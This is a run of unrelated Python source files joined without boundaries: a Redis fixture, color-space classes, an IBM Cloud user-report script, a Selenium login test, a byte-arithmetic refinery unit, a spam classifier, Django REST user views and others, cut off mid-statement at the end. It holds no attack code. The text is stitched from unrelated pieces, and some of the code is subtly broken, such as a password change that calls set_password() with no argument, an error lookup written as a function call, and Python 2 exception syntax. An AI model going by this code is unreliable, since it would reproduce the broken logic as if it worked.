level fixture, ensure database will be flushed after execution of the test function""" db_uri = "redis://localhost:6379/15" pool = redis.ConnectionPool.from_url(db_uri) r = redis.Redis(connection_pool=pool) assert r.ping() is True yield r r.flushdb() adaminfinitum/ColorHelper """Color base.""" from abc import ABCMeta from .. import util from . import _parse # Technically this form can handle any number of channels as long as any # extra are thrown away. We only support 6 currently. If we ever support # colors with more channels, we can bump this. RE_DEFAULT_MATCH = r"""(?xi) color\(\s* (?:({{color_space}})\s+)? ((?:{percent}|{float})(?:{space}(?:{percent}|{float})){{{{,{{channels:d}}}}}}(?:{slash}(?:{percent}|{float}))?) \s*\) """.format( **_parse.COLOR_PARTS ) # From CIE 2004 Colorimetry T.3 and T.8 # B from https://en.wikipedia.org/wiki/Standard_illuminant#White_point WHITES = { "A": (0.44758, 0.40745), "B": (0.34842, 0.35161), "C": (0.31006, 0.31616), "D50": (0.34570, 0.35850), # Use 4 digits like everyone "D55": (0.33243, 0.34744), "D65": (0.31270, 0.32900), # Use 4 digits like everyone "D75": (0.29903, 0.31488), "E": (1 / 3, 1 / 3), "F2": (0.37210, 0.37510), "F7": (0.31290, 0.32920), "F11": (0.38050, 0.37690) } class Angle(float): """Angle type.""" class Percent(float): """Percent type.""" class OptionalPercent(float): """Optional percent type.""" class GamutBound(tuple): """Bounded gamut value.""" class GamutUnbound(tuple): """Unbounded gamut value.""" class Cylindrical: """Cylindrical space.""" @classmethod def hue_name(cls): """Hue channel name.""" return "h" @classmethod def hue_index(cls): # pragma: no cover """Get hue index.""" return cls.CHANNEL_NAMES.index(cls.hue_name()) class Labish: """Lab-ish color spaces.""" @classmethod def labish_names(cls): """Return Lab-ish names in the order L a b.""" return cls.CHANNEL_NAMES[:3] @classmethod def labish_indexes(cls): # pragma: no cover """Return the index of the Lab-ish channels.""" names = cls.labish_names() return [cls.CHANNEL_NAMES.index(name) for name in names] class Lchish(Cylindrical): """Lch-ish color spaces.""" @classmethod def lchish_names(cls): # pragma: no cover """Return Lch-ish names in the order L c h.""" return cls.CHANNEL_NAMES[:3] @classmethod def lchish_indexes(cls): # pragma: no cover """Return the index of the Lab-ish channels.""" names = cls.lchish_names() return [cls.CHANNEL_NAMES.index(name) for name in names] class BaseSpace(ABCMeta): """Ensure on subclass that the subclass has new instances of mappings.""" def __init__(cls, name, bases, clsdict): """Copy mappings on subclass.""" if len(cls.mro()) > 2: cls.CHANNEL_ALIASES = dict(cls.CHANNEL_ALIASES) class Space( metaclass=BaseSpace ): """Base color space object.""" # Color space name SPACE = "" # Serialized name SERIALIZE = None # Number of channels NUM_COLOR_CHANNELS = 3 # Channel names CHANNEL_NAMES = ("alpha",) # Channel aliases CHANNEL_ALIASES = {} # For matching the default form of `color(space coords+ / alpha)`. # Classes should define this if they want to use the default match. DEFAULT_MATCH = "" # Match pattern variable for classes to override so we can also # maintain the default and other alternatives. MATCH = "" # Should this color also be checked in a different color space? Only when set to a string (specifying a color space) # will the default gamut checking also check the specified space as well as the current. # # Gamut checking: # The specified color space will be checked first followed by the original. Assuming the parent color space fits, # the original should fit as well, but there are some cases when a parent color space that is slightly out of # gamut, when evaluated with a threshold, may appear to be in gamut enough, but when checking the original color # space, the values can be greatly out of specification (looking at you HSL). GAMUT_CHECK = None # White point WHITE = "D50" def __init__(self, color, alpha=None): """Initialize.""" self._alpha = util.NaN self._coords = [util.NaN] * self.NUM_COLOR_CHANNELS if isinstance(color, Space): for index, channel in enumerate(color.coords()): self.set(self.CHANNEL_NAMES[index], channel) self.alpha = color.alpha elif isinstance(color, (list, tuple)): if len(color) != self.NUM_COLOR_CHANNELS: # pragma: no cover # Only likely to happen with direct usage internally. raise ValueError( "A list of channel values should be at a minimum of {}.".format(self.NUM_COLOR_CHANNELS) ) for index in range(self.NUM_COLOR_CHANNELS): self.set(self.CHANNEL_NAMES[index], color[index]) self.alpha = 1.0 if alpha is None else alpha else: # pragma: no cover # Only likely to happen with direct usage internally. raise TypeError("Unexpected type '{}' received".format(type(color))) def __repr__(self): """Representation.""" gamut = self.RANGE values = [] for i, coord in enumerate(self.coords()): fmt = util.fmt_percent if isinstance(gamut[i][0], Percent) else util.fmt_float values.append(fmt(coord, util.DEF_PREC)) return 'color({} {} / {})'.format( self._serialize()[0], ' '.join(values), util.fmt_float(util.no_nan(self.alpha), util.DEF_PREC) ) __str__ = __repr__ def _handle_input(self, value): """Handle numerical input.""" if not util.is_number(value): raise TypeError("Value should be a number not type '{}'".format(type(value))) return float(value) if not util.is_nan(value) else value def coords(self): """Coordinates.""" return self._coords[:] @classmethod def space(cls): """Get the color space.""" return cls.SPACE @classmethod def _serialize(cls): """Get the serialized name.""" return (cls.space(),) if cls.SERIALIZE is None else cls.SERIALIZE @classmethod def white(cls): """Get the white color for this color space.""" return WHITES[cls.WHITE] @property def alpha(self): """Alpha channel.""" return self._alpha @alpha.setter def alpha(self, value): """Adjust alpha.""" self._alpha = util.clamp(self._handle_input(value), 0.0, 1.0) def set(self, name, value): # noqa: A003 """Set the given channel.""" name = self.CHANNEL_ALIASES.get(name, name) if name not in self.CHANNEL_NAMES: raise ValueError("'{}' is an invalid channel name".format(name)) setattr(self, name, value) return self def get(self, name): """Get the given channel's value.""" name = self.CHANNEL_ALIASES.get(name, name) if name not in self.CHANNEL_NAMES: raise ValueError("'{}' is an invalid channel name".format(name)) return getattr(self, name) def to_string( self, parent, *, alpha=None, precision=None, fit=True, none=False, **kwargs ): """Convert to CSS 'color' string: `color(space coords+ / alpha)`.""" if precision is None: precision = parent.PRECISION a = util.no_nan(self.alpha) if not none else self.alpha alpha = alpha is not False and (alpha is True or a < 1.0 or util.is_nan(a)) method = None if not isinstance(fit, str) else fit coords = parent.fit(method=method).coords() if fit else self.coords() if not none: coords = util.no_nan(coords) gamut = self.RANGE template = "color({} {} / {})" if alpha else "color({} {})" values = [] for i, coord in enumerate(coords): fmt = util.fmt_percent if isinstance(gamut[i][0], Percent) else util.fmt_float values.append(fmt(coord, precision)) if alpha: return template.format( self._serialize()[0], ' '.join(values), util.fmt_float(a, max(precision, util.DEF_PREC)) ) else: return template.format(self._serialize()[0], ' '.join(values)) @classmethod def null_adjust(cls, coords, alpha): """Process coordinates and adjust any channels to null/NaN if required.""" return coords, alpha @classmethod def match(cls, string, start=0, fullmatch=True): """Match a color by string.""" m = cls.DEFAULT_MATCH.match(string, start) if ( m is not None and ( (m.group(1) and m.group(1).lower() in cls._serialize()) ) and (not fullmatch or m.end(0) == len(string)) ): # Break channels up into a list split = _parse.RE_SLASH_SPLIT.split(m.group(2).strip(), maxsplit=1) # Get alpha channel alpha = _parse.norm_alpha_channel(split[-1].lower()) if len(split) > 1 else 1.0 # Parse color channels channels = [] for i, c in enumerate(_parse.RE_CHAN_SPLIT.split(split[0]), 0): if c and i < cls.NUM_COLOR_CHANNELS: c = c.lower() # If the channel is a percentage, force it to scale from 0 - 100, not 0 - 1. is_percent = isinstance(cls.RANGE[i][0], Percent) # Don't bother restricting anything yet. CSS doesn't have any defined # spaces that use percentages and only percentages anymore. # They may never have spaces again that do this, or they might. # Custom spaces can restrict colors further, if desired, but we do not # desire to restrict further unless forced. # ``` # is_optional_percent = isinstance(cls.RANGE[i][0], OptionalPercent) # is_none = c == 'none' # has_percent = c.endswith('%') # # if not is_none: # if is_percent and not has_percent: # # We have an invalid percentage channel # return None, None # elif (not is_percent and not is_optional_percent) and has_percent: # # Percents are not allowed for this channel. # return None, None # ``` channels.append(_parse.norm_color_channel(c, not is_percent)) # Missing channels are filled with `NaN` if len(channels) < cls.NUM_COLOR_CHANNELS: diff = cls.NUM_COLOR_CHANNELS - len(channels) channels.extend([util.NaN] * diff) # Apply null adjustments (null hues) if applicable return cls.null_adjust(channels, alpha), m.end(0) return None, None from automator_class import Automator from config import _stored_mouse_positions_dir_pathlib FILE_PATH = _stored_mouse_positions_dir_pathlib / "mouse_positions_example.txt" IDLE_TIME = 5 def run_infinite_mouse_click(): automator = Automator() print(f"\nStarted automated process!!\n" f"To stop the process use ctrl+C...\n") positions_json = automator.get_mouse_positions_from_file(FILE_PATH) try: for key, position in positions_json.items(): print(f"Clicking {position} in {IDLE_TIME} seconds...") automator.idle_time(IDLE_TIME) automator.click(position) except KeyboardInterrupt: print("\nProcess interrupted sucessfully") if __name__ == "__main__": run_infinite_mouse_click() from uuid import UUID, uuid4 from typing import List class AnswerOption: def __init__(self, text: str = "default initialization value", is_correct: bool = False, its_id: UUID = None): if its_id is None: self.id = uuid4() else: self.id: UUID = its_id self.text: str = text self.is_correct: bool = is_correct class Question: def __init__(self, question: str, answer_options: List[AnswerOption], its_id: UUID = None): if its_id is None: self.id = uuid4() else: self.id: UUID = its_id self.text: str = question if answer_options is None: self.answer_options: List[AnswerOption] = [] else: self.answer_options: List[AnswerOption] = answer_options class Quiz: def __init__(self, name: str = 'nameless', questions: List[Question] = None, its_id: UUID = None): if its_id is None: self.id = uuid4() else: self.id: UUID = its_id self.name: str = name if questions is None: self.questions: List[Question] = [] else: self.questions: List[Question] = questions def add_question(self, question: Question) -> None: self.questions.append(question) #!/usr/bin/env python3 import yaml try: from yaml import CLoader as Loader, CDumper as Dumper except ImportError: from yaml import Loader, Dumper import os import json import argparse import pandas as pd from datetime import datetime import requests ############################################################################### # FUNCTIONS ############################################################################### def init(): """parse arguments, validate input, set variables""" # commandline arguments # https://docs.python.org/3/library/argparse.html parser = argparse.ArgumentParser(prog='python3 users_report.py -c ../../config.lcoal -u users.yaml -o json') parser.add_argument( "-c", "--config_file", required=True, help="Path to config file" ) parser.add_argument( "-u", "--users_file", required=True, help="Path to users file" ) list_of_output_formats=["csv", "json"] parser.add_argument( "-o", "--output_format", required=False, help="Output format", default="csv", choices=list_of_output_formats ) list_of_order_by=["association", "manager"] parser.add_argument( "-ob", "--order_by", required=False, help="Order By", default="manager", choices=list_of_order_by ) # Parse input arguments args = parser.parse_args() global CONFIG_FILE CONFIG_FILE=args.config_file global USERS_FILE USERS_FILE=args.users_file global OUTPUT_FORMAT OUTPUT_FORMAT=args.output_format global ORDER_BY ORDER_BY=args.order_by # Config values with open(CONFIG_FILE) as jsonfile: config = json.load(jsonfile) global IBM_CLOUD_APIKEY IBM_CLOUD_APIKEY=config['credentials']['ibm_cloud_apikey'] global IBMCLOUD_ORG_ACCOUNTID IBMCLOUD_ORG_ACCOUNTID=config['account']['accountid'] # Generate variable values now = datetime.now() date_time = now.strftime("%Y%m%dT%H%M%S%f") # Build directory global OUTPUT_DIR OUTPUT_DIR_ROOT='build' if(not os.path.exists(OUTPUT_DIR_ROOT)): os.makedirs(OUTPUT_DIR_ROOT) OUTPUT_DIR=("{}/{}").format(OUTPUT_DIR_ROOT, date_time) if(not os.path.exists(OUTPUT_DIR)): os.makedirs(OUTPUT_DIR) global USERS_REPORT_ORDERED_OUTPUT_FILENAME USERS_REPORT_ORDERED_OUTPUT_FILENAME=('{}/users_report_orderedby_{}_{}.{}').format(OUTPUT_DIR, ORDER_BY, date_time, OUTPUT_FORMAT) global USERS_REPORT_UNORDERED_OUTPUT_FILENAME USERS_REPORT_UNORDERED_OUTPUT_FILENAME=('{}/users_report_{}.{}').format(OUTPUT_DIR, date_time, OUTPUT_FORMAT) global VALID_USERS_OUTPUT_FILENAME VALID_USERS_OUTPUT_FILENAME = ('{}/valid_users_hcbt_{}.{}').format(OUTPUT_DIR, date_time, OUTPUT_FORMAT) global IBMCLOUD_ACCOUNT_USERS_OUTPUT_FILENAME IBMCLOUD_ACCOUNT_USERS_OUTPUT_FILENAME = ('{}/ibmcloud_users_{}_{}.{}').format(OUTPUT_DIR, IBMCLOUD_ORG_ACCOUNTID, date_time, OUTPUT_FORMAT) print( ("Running Users Report using Config File: {}, Ordered By: {}, Output format: {}, " + "Valid Users File: {}, Valid Users Output File: {}, IBM Cloud Account Output file: {}, " + "Ordered Users Report Output File: {}, Unordered Users Report Output File: {}") .format( CONFIG_FILE, ORDER_BY, OUTPUT_FORMAT, USERS_FILE, VALID_USERS_OUTPUT_FILENAME, IBMCLOUD_ACCOUNT_USERS_OUTPUT_FILENAME, USERS_REPORT_ORDERED_OUTPUT_FILENAME, USERS_REPORT_UNORDERED_OUTPUT_FILENAME ) ) def get_managers_from_users(users): """get_managers_from_users(users)""" managers=[] manager_emails=[] for user in users: user_manager_email=user["manager"] if (user_manager_email not in manager_emails): user_manager = { "email": user_manager_email } # add email to manager_emails array for user cross check below manager_emails.append(user_manager_email) # add full manager user to managers array for user in users: if(user["email"] == user_manager_email): user_manager["email"] = user["email"] user_manager["name"] = user["name"] user_manager["association"] = user["association"] managers.append(user_manager) return managers def get_users_for_manager(manager, valid_users): """get_users_for_manager(manager, valid_users)""" users_for_manager=[] for user in valid_users: user_manager_email=user["manager"] if (user_manager_email == manager["email"]): users_for_manager.append(user) return users_for_manager def get_associations_from_users(users): """get_associations_from_users(users)""" associations=[] for user in users: user_association=user["association"] if (user_association not in associations): associations.append(user_association) return associations def get_users_for_association(association, valid_users): """get_users_for_association(association, valid_users)""" users_for_association=[] for user in valid_users: user_association=user["association"] if (user_association == association): users_for_association.append(user) return users_for_association def get_ibmcloud_access_token(): """get_ibmcloud_access_token()""" url = "https://iam.cloud.ibm.com/identity/token" payload= { "apikey" : IBM_CLOUD_APIKEY, "response_type" : "cloud_iam", "grant_type" : "urn:ibm:params:oauth:grant-type:apikey" } headers = { 'Accept': 'application/json', 'Content-Type': 'application/x-www-form-urlencoded', } response = requests.request("POST", url, headers=headers, data=payload) access_token=response.json()['access_token'] return access_token def get_ibmcloud_users(): """get_ibm_cloud_users()""" # doc: https://cloud.ibm.com/apidocs/user-management#list-users IBMCLOUD_ACCOUNT_USERS_URL = "https://user-management.cloud.ibm.com/v2/accounts/{}/users".format(IBMCLOUD_ORG_ACCOUNTID) access_token = get_ibmcloud_access_token() #ORG_NAME="" #ORG_REGION=us-south #ORG_ACCOUNTID= # ibmcloud account org-users $ORG_NAME -r $ORG_REGION --output json > build/org_users.json headers1 = { 'Authorization': access_token, 'Accept': 'application/json', 'Content-Type': 'application/x-www-form-urlencoded', } payload = { 'grant_type': 'urn:ibm:params:oauth:grant-type:apikey', 'apikey' : 'iam_apikey' } response = requests.get(url=IBMCLOUD_ACCOUNT_USERS_URL, headers=headers1, data=payload) ibmcloud_users = response.json()['resources'] return ibmcloud_users def get_users_report(valid_users, ibmcloud_account_users): """get_users_report()""" users_report = [] valid_account_users = [] invalid_account_users = [] # use case 1: find users in account not in valid_users for account_user in ibmcloud_account_users: # check if account user is in valid_users is_valid_user=False for valid_user in valid_users: if ( account_user["email"] == valid_user["email"] ): account_user["name"] = valid_user["name"] account_user["identities"] = valid_user["identities"] if "resourceGroups" in valid_user: account_user["resourceGroups"] = valid_user["resourceGroups"] account_user["manager"] = valid_user["manager"] account_user["association"] = valid_user["association"] is_valid_user=True if is_valid_user: valid_account_users.append(account_user) else: invalid_account_users.append(account_user) users_report = { "valid_account_users" : valid_account_users, "invalid_account_users" : invalid_account_users } return users_report def write_to_file(report_lines, output_filename): """write to file""" if OUTPUT_FORMAT == "json": with open(output_filename, 'w') as fp: json.dump(report_lines, fp) elif OUTPUT_FORMAT == "csv": df = pd.read_json(json.dumps(report_lines)) df.to_csv(output_filename) else: with open(output_filename, 'w') as fp: json.dump(report_lines, fp) ############################################################################### # MAIN ############################################################################### init() # get valid users valid_users = [] with open(USERS_FILE, 'r') as stream: data_json = yaml.load(stream, Loader=Loader) report=[] valid_users = data_json["users"] write_to_file(valid_users, VALID_USERS_OUTPUT_FILENAME) # get ibmcloud account users ibmcloud_account_users=get_ibmcloud_users() write_to_file(ibmcloud_account_users, IBMCLOUD_ACCOUNT_USERS_OUTPUT_FILENAME) # cross-validate valid_users and ibmcloud_account_users # users_report = { # "valid_account_users" : valid_account_users, # "invalid_account_users" : invalid_account_users users_report_users = get_users_report(valid_users, ibmcloud_account_users) write_to_file(users_report_users, USERS_REPORT_UNORDERED_OUTPUT_FILENAME) # order users_report_users by order_by ordered_users_report_users = [] if(ORDER_BY=="association"): associations=get_associations_from_users(valid_users) valid_users_by_association = [] invalid_users_by_association = [] for association in associations: valid_users_for_association=get_users_for_association(association, users_report_users["valid_account_users"]) valid_users_by_association.append( { "name" : association, "valid_users" : valid_users_for_association } ) users_report_users = [{ "valid_users_by_association" : valid_users_by_association, "invalid_users" : users_report_users["invalid_account_users"], }] else: managers=get_managers_from_users(valid_users) valid_users_by_manager = [] invalid_users_by_manager = [] for manager in managers: valid_users_for_manager=get_users_for_manager(manager, users_report_users["valid_account_users"]) manager["valid_users"] = valid_users_for_manager valid_users_by_manager.append(manager) users_report_users = [{ "valid_users_by_manager" : valid_users_by_manager, "invalid_users" : users_report_users["invalid_account_users"], }] write_to_file(users_report_users, USERS_REPORT_ORDERED_OUTPUT_FILENAME) tnakae/irspack from pkg_resources import DistributionNotFound, get_distribution try: __version__ = get_distribution("irspack").version except DistributionNotFound: # pragma: no cover # package is not installed pass # pragma: no cover from irspack.definitions import DenseScoreArray, InteractionMatrix, UserIndexArray from irspack.evaluator import * from irspack.optimizers import * from irspack.recommenders import * from irspack.split import * from irspack.utils import * digital-asset/dazl-client1-10 # Copyright (c) 2017-2021 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved. # SPDX-License-Identifier: Apache-2.0 from asyncio import new_event_loop, set_event_loop from threading import Thread from dazl import Network, Party from dazl.damlast.pkgfile import Dar def blocking_setup(url: str, dar: Dar) -> "Party": """ Set up a ledger for a test in a completely blocking fashion. Used by the tests that test the thread-safe variants of the dazl API where avoiding contamination of the current async context is more important than the performance ramifications of calling this function. :param url: The URL of the remote Ledger API implementation to connect to. :param dar: A DAR file. :return: A newly allocated ``Party`` that is guaranteed to be used by no other client. """ return Setup(url, dar).run() class Setup: def __init__(self, url, dar): self.url = url self.party = None self.dar = dar self.network = None def run(self): # upload our DAR and allocate our Party in a completely separate thread as to try to avoid # polluting the current context t = Thread(target=self._main) t.start() t.join() return self.party def _main(self): # create a private event loop just for us set_event_loop(new_event_loop()) self.network = Network() self.network.set_config(url=self.url) client = self.network.aio_new_party() self.party = client.party self.network.run_until_complete(self.upload_dar()) async def upload_dar(self): await self.network.aio_global().ensure_dar(self.dar) iamjadhav/mobile_robot_arm import ikpy.chain import numpy as np def deg2rad(th): return th * np.pi / 180 my_chain = ikpy.chain.Chain.from_urdf_file("robot_arm.urdf") th1 = float(input("Enter rotation (in deg) for Rotating Arm: ")) th2 = float(input("Enter rotation (in deg) for Extending Arm: ")) th3 = float(input("Enter rotation (in deg) for Picking Arm: ")) th4 = float(input("Enter rotation (in deg) for Jaw Arm: ")) target_angle = [0, deg2rad(th1), deg2rad(th2), deg2rad(th3), deg2rad(th4), 0] position = my_chain.forward_kinematics(target_angle) print("Input joint angles: (%s, %s, %s, %s, %s, %s)" % (target_angle[0], target_angle[1], target_angle[2], target_angle[3], target_angle[4], target_angle[5])) print("X coordinate for end effector: ", position[0, 3]) print("Y coordinate for end effector: ", position[1, 3]) print("Z coordinate for end effector: ", position[2, 3]) 11110000 00001111 11110000 00001111 11110000 11111111 11000011 00111100 #coding=utf-8 from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.common.keys import Keys from selenium.webdriver.support.ui import Select from selenium.common.exceptions import NoSuchElementException from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.common.action_chains import ActionChains import unittest, time, re ,random,os import HTMLTestRunner # from selenium import webdriver # from selenium.webdriver.common.by import By # from selenium.webdriver.common.keys import Keys # from selenium.webdriver.support.ui import Select # from selenium.common.exceptions import NoSuchElementException # import time, re,HTMLTestRunner # import unittest # browser=webdriver.Chrome() # browser.get("http://www.baidu.com") # try: # browser.find_element_by_id("kwssss").send_keys("aaaaaaa") # browser.find_element_by_id("su").click() # except: # browser.get_screenshot_as_file(u"E:\工作任务\error_png.png") class Boss(unittest.TestCase): def setUp(self): self.driver = webdriver.Chrome() self.driver.implicitly_wait(30) self.Boss_url = "https://cas.qa.great-tao.com:8443/cas-server/login?service=http://boss.qa.great-tao.com/cas" self.verificationErrors = [] self.accept_next_alet=True def test_boss(self): try: driver = self.driver driver.get(self.Boss_url) driver.maximize_window() driver.find_element_by_id("username").send_keys("yuanjunling") driver.find_element_by_id("password").send_keys("") driver.find_element_by_id("captcha").send_keys("") driver.find_element_by_id("captcha").send_keys(Keys.ENTER) driver.close() except: driver.get_screenshot_as_file(u"E:\工作任务\异常截图\error_png.png") def is_element_present(self,how,what): try: self.driver.find_element(by=how,value=what) except NoSuchElementException,e :return False return True def tearDown(self): self.driver.quit() self.assertEqual([],self.verificationErrors) # if __name__ == "__main__ ": # 定义一个单元测试容器 # testunit = unittest.TestSuite() # 将测试用例加入到测试容器中 # testunit.addTest(Boss("test_boss")) # 定义个报告存放路径,支持相对路径 # filename = 'D:\\selenium_python\\report\\result.html' # fp = file(filename, 'wb') # 定义测试报告 # runner = HTMLTestRunner.HTMLTestRunner( # stream=fp, # title=u'BOSS报告', # description=u'用例执行情况:') # 运行测试用例 # runner.run(testunit) 0 #!/usr/bin/env python3 # -*- coding: utf-8 -*- from __future__ import annotations from refinery.units.blockwise import Arg, ArithmeticUnit, FastBlockError from refinery.lib.meta import metavars from refinery.lib.argformats import PythonExpression class IndexCounter: mask: int index: int def init(self, mask): self.mask = mask self.index = -1 def __iter__(self): return self def __next__(self): self.index = index = self.index + 1 & self.mask return index class alu(ArithmeticUnit): """ The arithmetic-logical unit. It allows you to specify a custom Python expression where the following variables are allowed: - the variable `A`: same as `V[0]` - the variable `B`: current block - the variable `N`: number of bytes in the input - the variable `I`: current index in the input - the variable `S`: an optional seed value for an internal state - the variable `V`: the vector of arguments Each block of the input is replaced by the value of this expression. Additionally, it is possible to specify prologue and epilogue expressions which are used to update the state variable `S` before and after the update of each block, respectively. """ @staticmethod def _parse_op(definition, default=None): """ An argparse type which uses the `refinery.lib.argformats.PythonExpression` parser to parse the expressions that can be passed to `refinery.alu`. Essentially, these are Python expressions which can contain variables `B`, `A`, `S`, and `V`. """ if not definition: if default is None: raise ValueError('No definition given') definition = default return PythonExpression(definition, *'IBASNV', all_variables_allowed=True) def __init__( self, operator: Arg(type=str, help='A Python expression defining the operation.'), *argument, seed: Arg('-s', type=str, help=( 'Optional seed value for the state variable S. The default is zero. This can be an expression ' 'involving the variable N.')) = 0, prologue: Arg('-p', type=str, metavar='E', help=( 'Optional expression with which the state variable S is updated before a block is operated on.')) = None, epilogue: Arg('-e', type=str, metavar='E', group='EPI', help=( 'Optional expression with which the state variable S is updated after a block was operated on.')) = None, inc: Arg('-I', group='EPI', help='equivalent to --epilogue=S+1') = False, dec: Arg('-D', group='EPI', help='equivalent to --epilogue=S-1') = False, cbc: Arg('-X', group='EPI', help='equivalent to --epilogue=(B)') = False, bigendian=False, blocksize=1, precision=None ): for flag, flag_is_set, expression in [ ('--cbc', cbc, '(B)'), ('--inc', inc, 'S+1'), ('--dec', dec, 'S-1'), ]: if flag_is_set: if epilogue is not None: raise ValueError( F'Ambiguous specification; epilogue was already set to {epilogue} ' F'when {flag} was parsed.' ) epilogue = expression self._index = IndexCounter() super().__init__( self._index, *argument, bigendian=bigendian, blocksize=blocksize, precision=precision, seed=seed, operator=self._parse_op(operator), prologue=self._parse_op(prologue, 'S'), epilogue=self._parse_op(epilogue, 'S'), ) @property def _is_ecb(self): return not self.args.epilogue and not self.args.prologue def _fastblock(self, _): raise FastBlockError def process(self, data): context = dict(metavars(data)) seed = self.args.seed if isinstance(seed, str): seed = PythonExpression(seed, 'N', constants=metavars(data)) if callable(seed): seed = seed(context, N=len(data)) self._index.init(self.fmask) prologue = self.args.prologue.expression epilogue = self.args.epilogue.expression operator = self.args.operator.expression context.update(N=len(data), S=seed) def operate(block, index, *args): context.update(I=index, B=block, V=args) if args: context['A'] = args[0] context['S'] = eval(prologue, None, context) context['B'] = eval(operator, None, context) context['S'] = eval(epilogue, None, context) return context['B'] placeholder = self.operate self.operate = operate result = super().process(data) self.operate = placeholder return result @staticmethod def operate(block, index, *args): raise RuntimeError('This operate method cannot be called.') def inplace(self, block, *args) -> None: super().inplace(block, *args) classifier.py import pandas as pd import pprint import numpy as np def readDataSet(): #make a dataframe df = pd.read_table('dataset/SMSSpamCollection', sep ='\t', header =None, names = ['label', 'message']) #label features with 0 and 1 df['label'] = df.label.map({'ham':0, 'spam':1}) return df #test_string = "ham Congratulations you won lottery of 100000$ to aavail give your bank info" def getTrainingTestingData(df): from sklearn.model_selection import train_test_split as tts x_message_train, x_message_test, y_label_train, y_label_test = tts(df['message'], df['label'], random_state = 1) from sklearn.feature_extraction.text import CountVectorizer #implimenting bag of words count_vector = CountVectorizer(stop_words = 'english') #print(count_vector) #dividing in training and testing data training_data = count_vector.fit_transform(x_message_train) testing_data = count_vector.transform(x_message_test) return { "training_data" : training_data, "testing_data" :testing_data, "y_label_train" : y_label_train, "y_label_test" : y_label_test } def make_predictions(train_test_data): from sklearn.naive_bayes import MultinomialNB nb = MultinomialNB() nb.fit(train_test_data["training_data"], train_test_data["y_label_train"]) predictions = nb.predict(train_test_data["testing_data"]) return predictions def print_accuracy(train_test_data, predictions): from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score print("Accuracy Score: "+format(accuracy_score(train_test_data["y_label_test"], predictions))) print("Precision Score: "+ format(precision_score(train_test_data["y_label_test"], predictions))) print("Recall Score : "+format(recall_score(train_test_data["y_label_test"], predictions))) print("f1 Score : "+format(f1_score(train_test_data["y_label_test"], predictions))) def runScript(): df = readDataSet() train_test_data = getTrainingTestingData(df) predictions = make_predictions(train_test_data) print_accuracy(train_test_data, predictions) runScript()1-10 #!/usr/bin/env python # -*- coding: utf-8 -*- # # @Author: () # @Date: 2019-11-12 # @Filename: __init__.py # @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause) from typing import TYPE_CHECKING from clu import Command from clu.parsers.click import command_parser from jaeger.actor import JaegerActor jaeger_parser = command_parser JaegerCommandType = Command[JaegerActor] from .can import * from .chiller import * from .configuration import * from .debug import * from .disable import * from .fvc import * from .ieb import * from .pollers import * from .positioner import * from .power import * from .snapshot import * from .talk import * from .unwind import * from .version import * ejercicios_python/Clase01/geringosov2.py # -*- coding: utf-8 -*- """ # Geringoso.py # Ejercicio 1.18 # @author: """ cadena = 'Geringoso' capadepenapa = '' for c in cadena: if c in 'aeiou': capadepenapa += c+'p'+c else: capadepenapa += c print(capadepenapa) """ resultado: Geperipingoposopo """ #%% cadena = input("Coloque su palabra: ") capadepenapa = '' for c in cadena: if c in 'aeiou': capadepenapa += c+'p'+c else: capadepenapa += c print(capadepenapa) from rest_framework.permissions import BasePermission def get_user(request): return request.user class IsStaff(BasePermission): """ Grants permission if the logged-in user is considered staff See https://docs.djangoproject.com/en/3.1/ref/contrib/auth/#django.contrib.auth.models.User.is_staff """ def has_permission(self, request, view): return request.user.is_staff def has_object_permission(self, request, view, obj): return request.user.is_staff class IsSuperUser(BasePermission): """ Grants permission if the logged-in user is considered a superuser See https://docs.djangoproject.com/en/3.1/ref/contrib/auth/#django.contrib.auth.models.User.is_superuser """ def has_permission(self, request, view): return request.user.is_superuser def has_object_permission(self, request, view, obj): return request.user.is_superuser# Create your views here. import logging from django.contrib.auth.models import User from drf_yasg.utils import swagger_auto_schema from rest_framework.exceptions import ValidationError, APIException, AuthenticationFailed from rest_framework.permissions import IsAuthenticated from rest_framework.views import APIView from rest_framework_jwt.authentication import JSONWebTokenAuthentication from user.serializers import UserInfoOut, ChangePwdIn, UpdateUserInfoIn, ChangePwdOut from utils.errors import ERROR from utils.resp import r200 logger = logging.getLogger(__name__) class UserInfoAPI(APIView): """ Get user info """ authentication_classes = (JSONWebTokenAuthentication,) permission_classes = (IsAuthenticated,) @swagger_auto_schema(responses={200: UserInfoOut}, tags=['user']) def get(self, request, *args, **kwargs): logger.info(f'user {request.user} get info') data_out = UserInfoOut(instance=request.user) return r200(data_out.data) class ChangePwdAPI(APIView): authentication_classes = (JSONWebTokenAuthentication,) permission_classes = (IsAuthenticated,) @swagger_auto_schema(request_body=ChangePwdIn, responses={200: ChangePwdOut}, tags=['user']) def post(self, request, *args, **kwargs): logger.info(f'[change password] data: {request.data}') data_in = ChangePwdIn(data=request.data) if not data_in.is_valid(): logger.error(data_in.errors) err = ERROR['INPUT'] err['data'] = data_in.errors raise ValidationError(err) old_password = data_in.validated_data['old_password'] new_password = data_in.validated_data['new_password'] try: if request.user.check_password(old_password): request.user.set_password() request.user.save(update_fields=['password']) else: logger.error('Invalid old password') err = ERROR['INVALID_PASSWORD'] raise AuthenticationFailed(err) except Exception as e: logger.error(f'Failed to change password: {e}') err = ERROR['CHANGE_PASSWORD_FAILED'] err['data'] = str(e) raise APIException(err) data_out = ChangePwdOut(instance=dict(success=True)) logger.info(f'[change password] id: {request.user} success: {data_out.data}') return r200(data=data_out.data) class UpdateInfoAPI(APIView): authentication_classes = (JSONWebTokenAuthentication,) permission_classes = (IsAuthenticated,) @swagger_auto_schema(request_body=UpdateUserInfoIn, responses={200: UserInfoOut}, tags=['user']) def post(self, request, *args, **kwargs): logger.info(f'[update info] data: {request.data}') data_in = UpdateUserInfoIn(data=request.data) if not data_in.is_valid(): logger.error(data_in.errors) raise ValidationError(data_in.errors) try: user = User.objects.filter(id=request.user.id) user.update(**data_in.validated_data) except Exception as e: logger.error(f'Failed to update user info: {e}') err = ERROR('USER_INFO_DATABASE') err['data'] = str(e) raise APIException(err) data_out = UserInfoOut(instance=user[0]) logger.info(f'[update info] id: {user} success {data_out.data}') return r200(data=data_out.data) """ Module for container object for the mnist data_set """ import numpy as np import cv2 class MnistDataset(object): def __init__(self, data_set_path, evaluation_set_path, size_reduction = False): self.training_data = np.array([]) self.evaluation_data = np.array([]) self.batch_size = 0 self.batches = 